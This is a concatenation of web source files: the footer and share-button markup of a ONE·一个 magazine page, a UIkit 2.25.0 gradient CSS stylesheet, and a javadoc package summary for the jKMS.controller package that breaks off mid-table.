appkey="1156389752" addition="number" type="button" default_text="(「ONE · 一个」VOL.495)"></wb:share-button> <script type="text/javascript"> (function(){ var p = { url:"http:\/\/wufazhuce.com\/one\/vol.495#cosas", showcount:'1', desc:'', title:"\uff08\u300cONE \u00b7 \u4e00\u4e2a\u300dVOL.495\uff09", summary:null, pics:'', site:'「ONE · 一个」', style:'102', width:145, height:26 }; var s = []; for(var i in p){ s.push(i + '=' + encodeURIComponent(p[i]||'')); } document.write(['<a version="1.0" class="qzOpenerDiv" href="http://sns.qzone.qq.com/cgi-bin/qzshare/cgi_qzshare_onekey?',s.join('&'),'" target="_blank">分享</a>'].join('')); })(); </script> <script src="http://qzonestyle.gtimg.cn/qzone/app/qzlike/qzopensl.js#jsdate=20111201" charset="utf-8"></script> </div> <div class="one-comentarios"> </div> </div> </div> </div> </div> </div> <script type="text/javascript"> $(document).ready(function() { $('a[data-toggle="tab"]').on('shown.bs.tab', function (e) { var hash = $(e.target).attr('href'); if (hash == "#tab-imagen") { hash = ""; } else { hash = hash.replace('#tab-', '#'); } $('#vanilla-comments').detach().prependTo($(e.target).attr('href') + ' .one-comentarios') location.hash = hash; window.scrollTo(0, 0); }) if (location.hash != "") { $('#one-navbar a[href='+location.hash.replace('#', '#tab-')+']').tab('show'); window.scrollTo(0, 0); } }); </script> </div> <div id="footer"> <div class="container"> <hr /> <p class="text-muted"> &copy; 2012-2014 <a href="http://wufazhuce.com/">「ONE · 一个」</a> </p> <p class="text-muted"> <a href="http://wufazhuce.com/acercade">关于</a> <a href="http://wufazhuce.com/politica">用户协议</a> <a href="http://wufazhuce.com/contacto">联系我们</a> </p> <p class="text-muted"> <a href="http://weibo.com/duchangtuanparty" target="_blank">一个App工作室</a> <a href="http://weibo.com/tianglinzhen" target="_blank">亭林镇工作室</a> <a href="http://zuicool.com/" target="_blank" rel="follow" title="健康跑、马拉松、越野跑、铁人三项、自行车的耐力运动分享社区 - 比赛、报名、成绩、照片、装备">最酷ZUICOOL</a> </p> <p> 复杂世界里, 一个就够了. One is all. </p> <p class="text-muted"> <a href="http://www.miibeian.gov.cn/" target="_blank" rel="nofollow" class="text-muted">沪ICP备13042400号</a> </p> </div> </div> <script src="http://tjs.sjs.sinajs.cn/open/api/js/wb.js?appkey=1156389752" type="text/javascript" charset="utf-8"></script> <script type="text/javascript"> var _bdhmProtocol = (("https:" == document.location.protocol) ? " https://" : " http://"); document.write(unescape("%3Cscript src='" + _bdhmProtocol + "hm.baidu.com/h.js%3Ff5c3b24a04c561936d708b55833d8294' type='text/javascript'%3E%3C/script%3E")); </script> </body> </html>
default/vendor/uikit/css/components/uikit.gradient.css
ivywe/Default
/*! UIkit 2.25.0 | http://www.getuikit.com | (c) 2014 YOOtheme | MIT License */ /* Componets style */ nav .uk-nav > li > a { padding: 2px 10px; font-size: 14px; line-height: 1.3; } nav .uk-nav > li { padding: 0; margin: 0; } /* * Sizes */ h1, .uk-h1 { font-size: 32px; line-height: 38px; } /* ======================================================================== Component: Advanced ========================================================================== */ .uk-dotnav { display: -ms-flexbox; display: -webkit-flex; display: flex; -ms-flex-wrap: wrap; -webkit-flex-wrap: wrap; flex-wrap: wrap; margin-left: -15px; margin-top: -15px; padding: 0; list-style: none; } .uk-dotnav > * { -ms-flex: none; -webkit-flex: none; flex: none; padding-left: 15px; margin-top: 15px; } .uk-dotnav:before, .uk-dotnav:after { content: ""; display: block; overflow: hidden; } .uk-dotnav:after { clear: both; } .uk-dotnav > * { float: left; } .uk-dotnav > * > * { display: block; box-sizing: content-box; width: 20px; height: 20px; border-radius: 50%; background: rgba(50, 50, 50, 0.1); text-indent: 100%; overflow: hidden; white-space: nowrap; -webkit-transition: all 0.2s ease-in-out; transition: all 0.2s ease-in-out; } .uk-dotnav > * > :hover, .uk-dotnav > * > :focus { background: rgba(50, 50, 50, 0.4); outline: none; } .uk-dotnav > * > :active { background: rgba(50, 50, 50, 0.6); } .uk-dotnav > .uk-active > * { background: rgba(50, 50, 50, 0.4); -webkit-transform: scale(1.3); transform: scale(1.3); } .uk-dotnav-contrast > * > * { background: rgba(255, 255, 255, 0.4); } .uk-dotnav-contrast > * > :hover, .uk-dotnav-contrast > * > :focus { background: rgba(255, 255, 255, 0.7); } .uk-dotnav-contrast > * > :active { background: rgba(255, 255, 255, 0.9); } .uk-dotnav-contrast > .uk-active > * { background: rgba(255, 255, 255, 0.9); } .uk-dotnav-vertical { -ms-flex-direction: column; -webkit-flex-direction: column; flex-direction: column; } .uk-dotnav-vertical > * { float: none; } .uk-slidenav { display: inline-block; box-sizing: border-box; width: 60px; height: 60px; line-height: 60px; color: rgba(50, 50, 50, 0.4); font-size: 60px; text-align: center; } .uk-slidenav:hover, .uk-slidenav:focus { outline: none; text-decoration: none; color: rgba(50, 50, 50, 0.7); cursor: pointer; } .uk-slidenav:active { color: rgba(50, 50, 50, 0.9); } .uk-slidenav-previous:before { content: "\f104"; font-family: FontAwesome; } .uk-slidenav-next:before { content: "\f105"; font-family: FontAwesome; } .uk-slidenav-position { position: relative; } .uk-slidenav-position .uk-slidenav { display: none; position: absolute; top: 50%; z-index: 1; margin-top: -30px; } .uk-slidenav-position:hover .uk-slidenav { display: block; } .uk-slidenav-position .uk-slidenav-previous { left: 20px; } .uk-slidenav-position .uk-slidenav-next { right: 20px; } .uk-slidenav-contrast { color: rgba(255, 255, 255, 0.5); } .uk-slidenav-contrast:hover, .uk-slidenav-contrast:focus { color: rgba(255, 255, 255, 0.7); } .uk-slidenav-contrast:active { color: rgba(255, 255, 255, 0.9); } .uk-form input[type="radio"], .uk-form input[type="checkbox"] { display: inline-block; height: 14px; width: 14px; border: 1px solid #aaaaaa; overflow: hidden; margin-top: -4px; vertical-align: middle; -webkit-appearance: none; outline: 0; background: transparent; } .uk-form input[type="radio"] { border-radius: 50%; } .uk-form input[type=radio]:before, .uk-form input[type=checkbox]:before { display: block; } .uk-form input[type=radio]:checked:before { content: ''; width: 8px; height: 8px; margin: 2px auto 0; border-radius: 50%; background: #00a8e6; } .uk-form input[type=checkbox]:checked:before, .uk-form input[type=checkbox]:indeterminate:before { content: "\f00c"; font-family: FontAwesome; font-size: 12px; -webkit-font-smoothing: antialiased; text-align: center; line-height: 12px; color: #00a8e6; } .uk-form input[type=checkbox]:indeterminate:before { content: "\f068"; } .uk-form input[type=radio]:disabled, .uk-form input[type=checkbox]:disabled { border-color: #dddddd; } .uk-form input[type=radio]:disabled:checked:before { background-color: #aaaaaa; } .uk-form input[type=checkbox]:disabled:checked:before, .uk-form input[type=checkbox]:disabled:indeterminate:before { color: #aaaaaa; } .uk-form-file { display: inline-block; vertical-align: middle; position: relative; overflow: hidden; } .uk-form-file input[type="file"] { position: absolute; top: 0; z-index: 1; width: 100%; opacity: 0; cursor: pointer; left: 0; font-size: 500px; } .uk-form-password { display: inline-block; position: relative; max-width: 100%; } .uk-form-password-toggle { display: block; position: absolute; top: 50%; right: 10px; margin-top: -6px; font-size: 13px; line-height: 13px; color: #999999; } .uk-form-password-toggle:hover { color: #999999; text-decoration: none; } .uk-form-password > input { padding-right: 50px !important; } .uk-form-select { display: inline-block; vertical-align: middle; position: relative; overflow: hidden; } .uk-form-select select { position: absolute; top: 0; z-index: 1; width: 100%; height: 100%; opacity: 0; cursor: pointer; left: 0; -webkit-appearance: none; } .uk-placeholder { margin-bottom: 15px; padding: 15px; border: 1px dashed #dddddd; background: #fafafa; color: #444444; } * + .uk-placeholder { margin-top: 15px; } .uk-placeholder > :last-child { margin-bottom: 0; } .uk-placeholder-large { padding-top: 80px; padding-bottom: 80px; } .uk-progress { box-sizing: border-box; height: 20px; margin-bottom: 15px; background: #f7f7f7; overflow: hidden; line-height: 20px; box-shadow: inset 0 0 0 1px rgba(0, 0, 0, 0.07), inset 0 2px 2px rgba(0, 0, 0, 0.07); border-radius: 4px; } * + .uk-progress { margin-top: 15px; } .uk-progress-bar { width: 0; height: 100%; background: #009dd8; float: left; -webkit-transition: width 0.6s ease; transition: width 0.6s ease; font-size: 12px; color: #ffffff; text-align: center; background-image: -webkit-linear-gradient(top, #00b4f5, #008dc5); background-image: linear-gradient(to bottom, #00b4f5, #008dc5); box-shadow: inset 0 -1px 0 rgba(0, 0, 0, 0.2), inset 0 0 0 1px rgba(0, 0, 0, 0.1); text-shadow: 0 -1px 0 rgba(0, 0, 0, 0.2); } .uk-progress-mini { height: 6px; } .uk-progress-small { height: 12px; } .uk-progress-success .uk-progress-bar { background-color: #82bb42; background-image: -webkit-linear-gradient(top, #9fd256, #6fac34); background-image: linear-gradient(to bottom, #9fd256, #6fac34); } .uk-progress-warning .uk-progress-bar { background-color: #f9a124; background-image: -webkit-linear-gradient(top, #fbb450, #f89406); background-image: linear-gradient(to bottom, #fbb450, #f89406); } .uk-progress-danger .uk-progress-bar { background-color: #d32c46; background-image: -webkit-linear-gradient(top, #ee465a, #c11a39); background-image: linear-gradient(to bottom, #ee465a, #c11a39); } .uk-progress-striped .uk-progress-bar { background-image: -webkit-linear-gradient(-45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent); background-image: linear-gradient(-45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent); background-size: 30px 30px; } .uk-progress-striped.uk-active .uk-progress-bar { -webkit-animation: uk-progress-bar-stripes 2s linear infinite; animation: uk-progress-bar-stripes 2s linear infinite; } @-webkit-keyframes uk-progress-bar-stripes { 0% { background-position: 0 0; } 100% { background-position: 30px 0; } } @keyframes uk-progress-bar-stripes { 0% { background-position: 0 0; } 100% { background-position: 30px 0; } } .uk-progress-mini, .uk-progress-small { border-radius: 500px; } .uk-accordion-title { margin-top: 0; margin-bottom: 15px; padding: 5px 15px; background: #f7f7f7; font-size: 18px; line-height: 24px; cursor: pointer; border: 1px solid #dddddd; border-radius: 4px; } .uk-accordion-content { padding: 0 15px 15px 15px; } .uk-accordion-content:before, .uk-accordion-content:after { content: ""; display: table; } .uk-accordion-content:after { clear: both; } .uk-accordion-content > :last-child { margin-bottom: 0; } .uk-autocomplete { display: inline-block; position: relative; max-width: 100%; vertical-align: middle; } .uk-nav-autocomplete > li > a { color: #444444; } .uk-nav-autocomplete > li.uk-active > a { background: #009dd8; color: #ffffff; outline: none; box-shadow: inset 0 2px 4px rgba(0, 0, 0, 0.2); text-shadow: 0 -1px 0 rgba(0, 0, 0, 0.2); } .uk-nav-autocomplete .uk-nav-header { color: #999999; } .uk-nav-autocomplete .uk-nav-divider { border-top: 1px solid #dddddd; } .uk-datepicker { z-index: 1050; width: auto; -webkit-animation: uk-fade 0.2s ease-in-out; animation: uk-fade 0.2s ease-in-out; -webkit-transform-origin: 0 0; transform-origin: 0 0; } .uk-datepicker-nav { margin-bottom: 15px; text-align: center; line-height: 20px; } .uk-datepicker-nav:before, .uk-datepicker-nav:after { content: ""; display: table; } .uk-datepicker-nav:after { clear: both; } .uk-datepicker-nav a { color: #444444; text-decoration: none; } .uk-datepicker-nav a:hover { color: #444444; } .uk-datepicker-previous { float: left; } .uk-datepicker-next { float: right; } .uk-datepicker-previous:after, .uk-datepicker-next:after { width: 20px; font-family: FontAwesome; } .uk-datepicker-previous:after { content: "\f053"; } .uk-datepicker-next:after { content: "\f054"; } .uk-datepicker-table { width: 100%; } .uk-datepicker-table th, .uk-datepicker-table td { padding: 2px; } .uk-datepicker-table th { font-size: 12px; } .uk-datepicker-table a { display: block; width: 26px; line-height: 24px; text-align: center; color: #444444; text-decoration: none; border: 1px solid transparent; border-radius: 4px; background-origin: border-box; } a.uk-datepicker-table-muted { color: #999999; } .uk-datepicker-table a:hover, .uk-datepicker-table a:focus { background-color: #fafafa; color: #444444; outline: none; border-color: rgba(0, 0, 0, 0.2); border-bottom-color: rgba(0, 0, 0, 0.3); text-shadow: 0 1px 0 #ffffff; } .uk-datepicker-table a:active { background-color: #f5f5f5; color: #444444; border-color: rgba(0, 0, 0, 0.2); border-top-color: rgba(0, 0, 0, 0.3); background-image: none; box-shadow: inset 0 2px 4px rgba(0, 0, 0, 0.1); } .uk-datepicker-table a.uk-active { background: #009dd8; color: #ffffff; border: 1px solid rgba(0, 0, 0, 0.2); border-bottom-color: rgba(0, 0, 0, 0.4); background-origin: border-box; background-image: -webkit-linear-gradient(top, #00b4f5, #008dc5); background-image: linear-gradient(to bottom, #00b4f5, #008dc5); text-shadow: 0 -1px 0 rgba(0, 0, 0, 0.2); } .uk-htmleditor-navbar { background: #f7f7f7; border: 1px solid rgba(0, 0, 0, 0.1); border-bottom-color: rgba(0, 0, 0, 0.2); border-top-left-radius: 4px; border-top-right-radius: 4px; background-origin: border-box; background-image: -webkit-linear-gradient(top, #ffffff, #eeeeee); background-image: linear-gradient(to bottom, #ffffff, #eeeeee); } .uk-htmleditor-navbar:before, .uk-htmleditor-navbar:after { content: ""; display: table; } .uk-htmleditor-navbar:after { clear: both; } .uk-htmleditor-navbar-nav { margin: 0; padding: 0; list-style: none; float: left; } .uk-htmleditor-navbar-nav > li { float: left; } .uk-htmleditor-navbar-nav > li > a { display: block; box-sizing: border-box; text-decoration: none; height: 41px; padding: 0 15px; line-height: 40px; color: #444444; font-size: 11px; cursor: pointer; margin-top: -1px; margin-left: -1px; border: 1px solid transparent; border-bottom-width: 0; text-shadow: 0 1px 0 #ffffff; } .uk-htmleditor-navbar-nav > li:hover > a, .uk-htmleditor-navbar-nav > li > a:focus { background-color: transparent; color: #444444; outline: none; position: relative; z-index: 1; border-left-color: rgba(0, 0, 0, 0.1); border-right-color: rgba(0, 0, 0, 0.1); border-top-color: rgba(0, 0, 0, 0.1); box-shadow: inset 0 2px 4px rgba(0, 0, 0, 0.1); } .uk-htmleditor-navbar-nav > li > a:active { background-color: #f5f5f5; color: #444444; border-left-color: rgba(0, 0, 0, 0.1); border-right-color: rgba(0, 0, 0, 0.1); border-top-color: rgba(0, 0, 0, 0.2); box-shadow: inset 0 2px 4px rgba(0, 0, 0, 0.1); } .uk-htmleditor-navbar-nav > li.uk-active > a { background-color: #fafafa; color: #444444; border-left-color: rgba(0, 0, 0, 0.1); border-right-color: rgba(0, 0, 0, 0.1); border-top-color: rgba(0, 0, 0, 0.2); box-shadow: inset 0 2px 4px rgba(0, 0, 0, 0.1); } .uk-htmleditor-navbar-flip { float: right; } [data-mode='split'] .uk-htmleditor-button-code, [data-mode='split'] .uk-htmleditor-button-preview { display: none; } .uk-htmleditor-content { border-left: 1px solid #dddddd; border-right: 1px solid #dddddd; border-bottom: 1px solid #dddddd; background: #ffffff; border-bottom-left-radius: 4px; border-bottom-right-radius: 4px; } .uk-htmleditor-content:before, .uk-htmleditor-content:after { content: ""; display: table; } .uk-htmleditor-content:after { clear: both; } .uk-htmleditor-fullscreen { position: fixed; top: 0; left: 0; right: 0; bottom: 0; z-index: 990; } .uk-htmleditor-fullscreen .uk-htmleditor-content { position: absolute; top: 41px; left: 0; right: 0; bottom: 0; } .uk-htmleditor-fullscreen .uk-icon-expand:before { content: "\f066"; } .uk-htmleditor-code, .uk-htmleditor-preview { box-sizing: border-box; } .uk-htmleditor-preview { padding: 20px; overflow-y: scroll; position: relative; } [data-mode='tab'][data-active-tab='code'] .uk-htmleditor-preview, [data-mode='tab'][data-active-tab='preview'] .uk-htmleditor-code { display: none; } [data-mode='split'] .uk-htmleditor-code, [data-mode='split'] .uk-htmleditor-preview { float: left; width: 50%; } [data-mode='split'] .uk-htmleditor-code { border-right: 1px solid #eeeeee; } .uk-htmleditor-iframe { position: absolute; top: 0; left: 0; width: 100%; height: 100%; } .uk-htmleditor .CodeMirror { padding: 10px; box-sizing: border-box; } .uk-htmleditor-navbar-nav:first-child > li:first-child > a { border-top-left-radius: 4px; } .uk-htmleditor-navbar-flip .uk-htmleditor-navbar-nav > li > a { margin-left: 0; margin-right: -1px; } .uk-htmleditor-navbar-flip .uk-htmleditor-navbar-nav:first-child > li:first-child > a { border-top-left-radius: 0; } .uk-htmleditor-navbar-flip .uk-htmleditor-navbar-nav:last-child > li:last-child > a { border-top-right-radius: 4px; } .uk-htmleditor-fullscreen .uk-htmleditor-navbar { border-top: none; border-left: none; border-right: none; border-radius: 0; } .uk-htmleditor-fullscreen .uk-htmleditor-content { border: none; border-radius: 0; } .uk-htmleditor-fullscreen .uk-htmleditor-navbar-nav > li > a { border-radius: 0 !important; } .uk-slider { position: relative; z-index: 0; touch-action: pan-y; } .uk-slider:not(.uk-grid) { margin: 0; padding: 0; list-style: none; } .uk-slider > * { position: absolute; top: 0; left: 0; } .uk-slider-container { overflow: hidden; } .uk-slider:not(.uk-drag) { -webkit-transition: -webkit-transform 200ms linear; transition: transform 200ms linear; } .uk-slider.uk-drag { cursor: col-resize; -moz-user-select: none; -webkit-user-select: none; -ms-user-select: none; user-select: none; } .uk-slider a, .uk-slider img { -webkit-user-drag: none; user-drag: none; -webkit-touch-callout: none; } .uk-slider img { pointer-events: none; } .uk-slider-fullscreen, .uk-slider-fullscreen > li { height: 100vh; } .uk-slideshow { position: relative; z-index: 0; width: 100%; margin: 0; padding: 0; list-style: none; overflow: hidden; touch-action: pan-y; } .uk-slideshow > li { position: absolute; top: 0; left: 0; width: 100%; opacity: 0; } .uk-slideshow > .uk-active { z-index: 10; opacity: 1; } .uk-slideshow > li > img { visibility: hidden; } [data-uk-slideshow-slide] { cursor: pointer; } .uk-slideshow-fullscreen, .uk-slideshow-fullscreen > li { height: 100vh; } .uk-slideshow-fade-in { -webkit-animation: uk-fade 0.5s linear; animation: uk-fade 0.5s linear; } .uk-slideshow-fade-out { -webkit-animation: uk-fade 0.5s linear reverse; animation: uk-fade 0.5s linear reverse; } .uk-slideshow-scroll-forward-in { -webkit-animation: uk-slide-right 0.5s ease-in-out; animation: uk-slide-right 0.5s ease-in-out; } .uk-slideshow-scroll-forward-out { -webkit-animation: uk-slide-left 0.5s ease-in-out reverse; animation: uk-slide-left 0.5s ease-in-out reverse; } .uk-slideshow-scroll-backward-in { -webkit-animation: uk-slide-left 0.5s ease-in-out; animation: uk-slide-left 0.5s ease-in-out; } .uk-slideshow-scroll-backward-out { -webkit-animation: uk-slide-right 0.5s ease-in-out reverse; animation: uk-slide-right 0.5s ease-in-out reverse; } .uk-slideshow-scale-out { -webkit-animation: uk-fade-scale-15 0.5s ease-in-out reverse; animation: uk-fade-scale-15 0.5s ease-in-out reverse; } .uk-slideshow-swipe-forward-in { -webkit-animation: uk-slide-left-33 0.5s ease-in-out; animation: uk-slide-left-33 0.5s ease-in-out; } .uk-slideshow-swipe-forward-out { -webkit-animation: uk-slide-left 0.5s ease-in-out reverse; animation: uk-slide-left 0.5s ease-in-out reverse; } .uk-slideshow-swipe-backward-in { -webkit-animation: uk-slide-right-33 0.5s ease-in-out; animation: uk-slide-right-33 0.5s ease-in-out; } .uk-slideshow-swipe-backward-out { -webkit-animation: uk-slide-right 0.5s ease-in-out reverse; animation: uk-slide-right 0.5s ease-in-out reverse; } .uk-slideshow-swipe-forward-in:before, .uk-slideshow-swipe-backward-in:before { content: ''; position: absolute; top: 0; bottom: 0; left: 0; right: 0; z-index: 1; background: rgba(0, 0, 0, 0.6); -webkit-animation: uk-fade 0.5s ease-in-out reverse; animation: uk-fade 0.5s ease-in-out reverse; } .uk-notify { position: fixed; top: 10px; left: 10px; z-index: 1040; box-sizing: border-box; width: 350px; } .uk-notify-top-right, .uk-notify-bottom-right { left: auto; right: 10px; } .uk-notify-top-center, .uk-notify-bottom-center { left: 50%; margin-left: -175px; } .uk-notify-bottom-left, .uk-notify-bottom-right, .uk-notify-bottom-center { top: auto; bottom: 10px; } @media (max-width: 479px) { .uk-notify { left: 10px; right: 10px; width: auto; margin: 0; } } .uk-notify-message { position: relative; margin-bottom: 10px; padding: 15px; background: #444444; color: #ffffff; font-size: 16px; line-height: 22px; cursor: pointer; border: 1px solid #444444; border-radius: 4px; } .uk-notify-message > .uk-close { visibility: hidden; float: right; } .uk-notify-message:hover > .uk-close { visibility: visible; } .uk-notify-message-primary { background: #ebf7fd; color: #2d7091; border-color: rgba(45, 112, 145, 0.3); } .uk-notify-message-success { background: #f2fae3; color: #659f13; border-color: rgba(101, 159, 19, 0.3); } .uk-notify-message-warning { background: #fffceb; color: #e28327; border-color: rgba(226, 131, 39, 0.3); } .uk-notify-message-danger { background: #fff1f0; color: #d85030; border-color: rgba(216, 80, 48, 0.3); } .uk-search { display: inline-block; position: relative; margin: 0; } .uk-search:before { content: "\f002"; position: absolute; top: 0; left: 0; width: 30px; line-height: 30px; text-align: center; font-family: FontAwesome; font-size: 14px; color: rgba(0, 0, 0, 0.2); } .uk-search-field::-moz-focus-inner { border: 0; padding: 0; } .uk-search-field::-webkit-search-cancel-button, .uk-search-field::-webkit-search-decoration { -webkit-appearance: none; } .uk-search-field::-ms-clear { display: none; } .uk-search-field::-moz-placeholder { opacity: 1; } .uk-search-field { box-sizing: border-box; margin: 0; border-radius: 0; font: inherit; color: #444444; -webkit-appearance: none; width: 120px; height: 30px; padding: 0 0 0 30px; border: 1px solid rgba(0, 0, 0, 0); background: rgba(0, 0, 0, 0); -webkit-transition: all linear 0.2s; transition: all linear 0.2s; vertical-align: middle; } .uk-search-field:-ms-input-placeholder { color: #999999 !important; } .uk-search-field::-moz-placeholder { color: #999999; } .uk-search-field::-webkit-input-placeholder { color: #999999; } .uk-search-field:focus { outline: 0; } .uk-search-field:focus, .uk-search.uk-active .uk-search-field { width: 180px; } .uk-dropdown-search { width: 300px; margin-top: 0; background: #ffffff; color: #444444; } .uk-open > .uk-dropdown-search { -webkit-animation: uk-slide-top-fixed 0.2s ease-in-out; animation: uk-slide-top-fixed 0.2s ease-in-out; } .uk-navbar-flip .uk-dropdown-search { margin-top: 12px; margin-right: -16px; } .uk-nav-search > li > a { color: #444444; } .uk-nav-search > li.uk-active > a { background: #009dd8; color: #ffffff; outline: none; box-shadow: inset 0 2px 4px rgba(0, 0, 0, 0.2); text-shadow: 0 -1px 0 rgba(0, 0, 0, 0.2); } .uk-nav-search .uk-nav-header { color: #999999; } .uk-nav-search .uk-nav-divider { border-top: 1px solid #dddddd; } .uk-nav-search ul a { color: #0077dd; } .uk-nav-search ul a:hover { color: #005599; } .uk-offcanvas .uk-search { display: block; margin: 20px 15px; } .uk-offcanvas .uk-search:before { color: #777777; } .uk-offcanvas .uk-search-field { width: 100%; border-color: rgba(0, 0, 0, 0); background: #1a1a1a; color: #cccccc; } .uk-offcanvas .uk-search-field:-ms-input-placeholder { color: #777777 !important; } .uk-offcanvas .uk-search-field::-moz-placeholder { color: #777777; } .uk-offcanvas .uk-search-field::-webkit-input-placeholder { color: #777777; } .uk-nestable { padding: 0; list-style: none; } .uk-nestable a, .uk-nestable img { -webkit-touch-callout: none; } .uk-nestable-list { margin: 0; padding-left: 40px; list-style: none; } .uk-nestable-item { touch-action: none; } .uk-nestable-item + .uk-nestable-item { margin-top: 10px; } .uk-nestable-list:not(.uk-nestable-dragged) > .uk-nestable-item:first-child { margin-top: 10px; } .uk-nestable-dragged { position: absolute; z-index: 1050; pointer-events: none; padding-left: 0; } .uk-nestable-placeholder { position: relative; } .uk-nestable-placeholder > * { opacity: 0; } .uk-nestable-placeholder:after { content: ''; position: absolute; top: 0; bottom: 0; left: 0; right: 0; border: 1px dashed #dddddd; opacity: 1; } .uk-nestable-empty { min-height: 30px; } .uk-nestable-handle { touch-action: none; } .uk-nestable-handle:hover { cursor: move; } .uk-nestable-moving, .uk-nestable-moving * { cursor: move; } [data-nestable-action='toggle'] { cursor: pointer; -moz-user-select: none; -webkit-user-select: none; -ms-user-select: none; user-select: none; } .uk-nestable-toggle { display: inline-block; visibility: hidden; } .uk-nestable-toggle:after { content: "\f147"; font-family: FontAwesome; } .uk-parent > :not(.uk-nestable-list) .uk-nestable-toggle { visibility: visible; } .uk-collapsed .uk-nestable-list { display: none; } .uk-collapsed .uk-nestable-toggle:after { content: "\f196"; } .uk-nestable-panel { padding: 5px; background: #f7f7f7; border-radius: 4px; border: 1px solid rgba(0, 0, 0, 0.2); border-bottom-color: rgba(0, 0, 0, 0.3); background-origin: border-box; background-image: -webkit-linear-gradient(top, #ffffff, #eeeeee); background-image: linear-gradient(to bottom, #ffffff, #eeeeee); text-shadow: 0 1px 0 #ffffff; } .uk-sortable { position: relative; } .uk-sortable > * { touch-action: none; } .uk-sortable a, .uk-sortable img { -webkit-touch-callout: none; } .uk-sortable > :last-child { margin-bottom: 0; } .uk-sortable-dragged { position: absolute; z-index: 1050; pointer-events: none; } .uk-sortable-placeholder { opacity: 0; } .uk-sortable-empty { min-height: 30px; } .uk-sortable-handle { touch-action: none; } .uk-sortable-handle:hover { cursor: move; } .uk-sortable-moving, .uk-sortable-moving * { cursor: move; } [data-uk-sticky].uk-active { z-index: 980; box-sizing: border-box; } .uk-sticky-placeholder > * { -webkit-backface-visibility: hidden; backface-visibility: hidden; } [data-uk-sticky][class*='uk-animation-'] { -webkit-animation-duration: 0.2s; animation-duration: 0.2s; } [data-uk-sticky].uk-animation-reverse { -webkit-animation-duration: 0.2s; animation-duration: 0.2s; } .uk-dragover { box-shadow: 0 0 20px rgba(100, 100, 100, 0.3); } .uk-tooltip { display: none; position: absolute; z-index: 1030; box-sizing: border-box; max-width: 200px; padding: 5px 8px; background: #333333; color: rgba(255, 255, 255, 0.7); font-size: 12px; line-height: 18px; border-radius: 3px; text-shadow: 0 1px 0 rgba(0, 0, 0, 0.5); } .uk-tooltip:after { content: ""; display: block; position: absolute; width: 0; height: 0; border: 5px dashed #333333; } .uk-tooltip-top:after, .uk-tooltip-top-left:after, .uk-tooltip-top-right:after { bottom: -5px; border-top-style: solid; border-bottom: none; border-left-color: transparent; border-right-color: transparent; border-top-color: #333333; } .uk-tooltip-bottom:after, .uk-tooltip-bottom-left:after, .uk-tooltip-bottom-right:after { top: -5px; border-bottom-style: solid; border-top: none; border-left-color: transparent; border-right-color: transparent; border-bottom-color: #333333; } .uk-tooltip-top:after, .uk-tooltip-bottom:after { left: 50%; margin-left: -5px; } .uk-tooltip-top-left:after, .uk-tooltip-bottom-left:after { left: 10px; } .uk-tooltip-top-right:after, .uk-tooltip-bottom-right:after { right: 10px; } .uk-tooltip-left:after { right: -5px; top: 50%; margin-top: -5px; border-left-style: solid; border-right: none; border-top-color: transparent; border-bottom-color: transparent; border-left-color: #333333; } .uk-tooltip-right:after { left: -5px; top: 50%; margin-top: -5px; border-right-style: solid; border-left: none; border-top-color: transparent; border-bottom-color: transparent; border-right-color: #333333; }
doc/jKMS/controller/package-summary.html
freeDom-/jKMS
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- NewPage --> <html lang="de"> <head> <!-- Generated by javadoc (version 1.7.0_111) on Wed Sep 28 13:14:16 CEST 2016 --> <title>jKMS.controller</title> <meta name="date" content="2016-09-28"> <link rel="stylesheet" type="text/css" href="../../stylesheet.css" title="Style"> </head> <body> <script type="text/javascript"><!-- if (location.href.indexOf('is-external=true') == -1) { parent.document.title="jKMS.controller"; } //--> </script> <noscript> <div>JavaScript is disabled on your browser.</div> </noscript> <!-- ========= START OF TOP NAVBAR ======= --> <div class="topNav"><a name="navbar_top"> <!-- --> </a><a href="#skip-navbar_top" title="Skip navigation links"></a><a name="navbar_top_firstrow"> <!-- --> </a> <ul class="navList" title="Navigation"> <li><a href="../../overview-summary.html">Overview</a></li> <li class="navBarCell1Rev">Package</li> <li>Class</li> <li><a href="package-use.html">Use</a></li> <li><a href="package-tree.html">Tree</a></li> <li><a href="../../deprecated-list.html">Deprecated</a></li> <li><a href="../../index-files/index-1.html">Index</a></li> <li><a href="../../help-doc.html">Help</a></li> </ul> </div> <div class="subNav"> <ul class="navList"> <li><a href="../../jKMS/cards/package-summary.html">Prev Package</a></li> <li><a href="../../jKMS/exceptionHelper/package-summary.html">Next Package</a></li> </ul> <ul class="navList"> <li><a href="../../index.html?jKMS/controller/package-summary.html" target="_top">Frames</a></li> <li><a href="package-summary.html" target="_top">No Frames</a></li> </ul> <ul class="navList" id="allclasses_navbar_top"> <li><a href="../../allclasses-noframe.html">All Classes</a></li> </ul> <div> <script type="text/javascript"><!-- allClassesLink = document.getElementById("allclasses_navbar_top"); if(window==top) { allClassesLink.style.display = "block"; } else { allClassesLink.style.display = "none"; } //--> </script> </div> <a name="skip-navbar_top"> <!-- --> </a></div> <!-- ========= END OF TOP NAVBAR ========= --> <div class="header"> <h1 title="Package" class="title">Package&nbsp;jKMS.controller</h1> </div> <div class="contentContainer"> <ul class="blockList"> <li class="blockList"> <table class="packageSummary" border="0" cellpadding="3" cellspacing="0" summary="Class Summary table, listing classes, and an explanation"> <caption><span>Class Summary</span><span class="tabEnd">&nbsp;</span></caption> <tr> <th class="colFirst" scope="col">Class</th> <th class="colLast" scope="col">Description</th> </tr> <tbody> <tr class="altColor"> <td class="colFirst"><a href="../../jKMS/controller/AbstractController.html" title="class in jKMS.controller">AbstractController</a></td> <td class="colLast"> <div class="block">Abstract for all controllers so that they all get a kms attribute.</div> </td> </tr> <tr class="rowColor"> <td class="colFirst"><a href="../../jKMS/controller/AbstractServerController.html" title="class in jKMS.controller">AbstractServerController</a></td> <td class="colLast"> <div class="block">Abstract Server Controller as parent for all server side controllers</div> </td> </tr> <tr class="altColor"> <td class="colFirst"><a href="../../jKMS/controller/ClientController.html" title="class in jKMS.controller">ClientController</a></td> <td class="colLast"> <div class="block">Client Controller for all pages on the client side [contract].</div> </td> </tr> <tr class="rowColor"> <td class="colFirst"><a href="../../jKMS/controller/ControllerHelper.html" title="class in 